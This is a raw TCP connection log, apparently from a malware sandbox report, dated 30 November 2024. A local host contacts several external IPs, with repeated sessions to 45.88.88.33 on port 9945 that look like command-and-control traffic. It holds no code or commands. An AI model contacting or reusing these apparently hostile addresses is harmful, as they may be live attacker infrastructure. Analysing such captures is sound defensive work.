                                                                          Nov 30, 2024 20:15:03.784548044 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.784564018 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.784653902 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.784668922 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.784722090 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.797518969 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.797533035 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.797605991 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.797621965 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.797672033 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.810378075 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.810394049 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.810503960 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.810525894 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.810580015 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.821759939 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.821775913 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.821866035 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.821882010 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.821940899 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.833498001 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.833513975 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.833601952 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.833616972 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.833672047 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.844038963 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.844055891 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.844147921 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.844163895 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.844224930 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.963470936 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.963488102 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.963612080 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.963639975 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.963700056 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.973046064 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.973061085 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.973138094 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.973153114 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.973218918 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.982393980 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.982410908 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.982486010 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.982500076 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.982552052 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.992011070 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.992027998 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.992100000 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.992114067 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.992172956 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.000426054 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.000442028 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.000526905 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.000540972 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.000592947 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.010497093 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.010513067 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.010613918 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.010627985 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.010674953 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.019021988 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.019037962 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.019083023 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.019098043 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.019128084 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.019164085 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.028302908 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.028318882 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.028386116 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.028400898 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.028574944 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.167017937 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.167043924 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.167078018 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.167146921 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:04.167165995 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.167222977 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:04.171045065 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:34.940387011 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:34.940418959 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:34.940499067 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:34.944642067 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:34.944653988 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:36.532442093 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:36.532517910 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:36.548983097 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:36.548995972 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:36.549236059 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:36.549293995 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:36.553395033 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:36.599338055 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.218679905 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.218708992 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.218728065 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.218899965 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.218899965 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.218928099 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.219014883 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.328361988 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.328389883 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.328546047 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.328546047 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.328557014 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.330761909 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.386815071 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.386842012 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.386899948 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.386924982 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.386951923 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.386960983 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.495621920 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.495647907 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.495692015 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.495701075 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.495727062 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.495748997 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.531184912 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.531212091 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.531274080 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.531286001 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.531331062 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.555850029 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.555874109 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.555919886 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.555927992 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.555948973 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.555973053 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.607464075 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.607481003 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.607554913 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.607563972 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.607604980 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.682713985 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.682739019 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.682800055 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.682818890 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.682867050 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.704045057 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.704061985 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.704128981 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.704152107 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.704195976 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.724673033 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.724698067 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.724791050 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.724816084 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.724857092 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.743470907 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.743488073 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.743561029 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.743585110 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.743627071 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.755079985 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.755096912 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.755166054 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.755188942 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.755234957 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.775629997 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.775665045 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.775758982 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.775780916 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.775825977 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.867875099 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.867894888 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.867988110 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.868011951 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.868062973 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.879859924 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.879884958 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.879941940 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.879952908 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.879976988 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.879996061 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.891815901 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.891830921 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.891889095 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.891911983 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.891952991 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.902354956 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.902370930 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.902431965 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.902456999 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.902496099 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.914298058 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.914313078 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.914371014 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.914395094 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.914433002 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.924787045 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.924803019 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.924877882 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.924901962 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.924942017 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.934269905 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.934284925 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.934339046 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.934361935 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.934400082 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.968012094 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.968029022 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.968080044 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:37.968101978 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:37.968141079 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.062330961 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.062345982 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.062393904 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.062436104 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.062447071 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.062490940 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.071799040 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.071821928 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.071880102 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.071887970 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.071923018 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.071939945 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.081526041 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.081542015 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.081613064 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.081620932 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.081662893 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.090114117 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.090130091 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.090204000 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.090214014 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.090265036 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.099859953 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.099877119 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.099968910 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.099996090 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.100037098 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.108833075 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.108849049 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.109009027 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.109033108 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.109077930 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.117839098 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.117854118 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.117903948 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.117928028 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.117964029 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.158915043 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.158931971 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.159003019 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.159025908 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.159061909 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.253488064 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.253505945 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.253583908 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.253607035 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.253649950 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.255141020 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.255194902 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.255201101 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.255225897 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.255244017 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.255290985 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.255316973 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.255316973 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:38.255331039 CET4434973792.205.55.123192.168.2.4
                                                                          Nov 30, 2024 20:15:38.255378008 CET49737443192.168.2.492.205.55.123
                                                                          Nov 30, 2024 20:15:40.296680927 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:40.418373108 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:40.418596029 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:40.430304050 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:40.554483891 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:41.726711988 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:41.766249895 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:41.968400955 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:41.989204884 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.114917994 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.114998102 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.242033958 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.539577961 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.541986942 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.662273884 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.741264105 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.746412039 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.747044086 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.797492027 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.872698069 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.872831106 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.873564005 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:42.873637915 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.876811981 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.877861023 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:42.937939882 CET4974180192.168.2.4178.237.33.50
                                                                          Nov 30, 2024 20:15:43.000910044 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:43.001972914 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:43.062674999 CET8049741178.237.33.50192.168.2.4
                                                                          Nov 30, 2024 20:15:43.062864065 CET4974180192.168.2.4178.237.33.50
                                                                          Nov 30, 2024 20:15:43.063020945 CET4974180192.168.2.4178.237.33.50
                                                                          Nov 30, 2024 20:15:43.187208891 CET8049741178.237.33.50192.168.2.4
                                                                          Nov 30, 2024 20:15:44.129040003 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.172506094 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.227808952 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.281888962 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.356525898 CET8049741178.237.33.50192.168.2.4
                                                                          Nov 30, 2024 20:15:44.356587887 CET4974180192.168.2.4178.237.33.50
                                                                          Nov 30, 2024 20:15:44.363524914 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.367805004 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.369441986 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.480995893 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.487101078 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.492223024 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.494071960 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.494144917 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.609667063 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.609750986 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.615672112 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.729707003 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.903976917 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.904192924 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.904206038 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.904257059 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.905258894 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.905275106 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.905304909 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.953756094 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.982189894 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.982403040 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.982455015 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.982564926 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.982966900 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.983000994 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:44.990708113 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.990993023 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:44.991046906 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.024311066 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.024431944 CET99454973945.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.024498940 CET497399945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.062890053 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.063131094 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.063141108 CET99454974045.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:15:45.063175917 CET497409945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:15:45.063997984 CET99454974045.88.88.33192.168.2.4
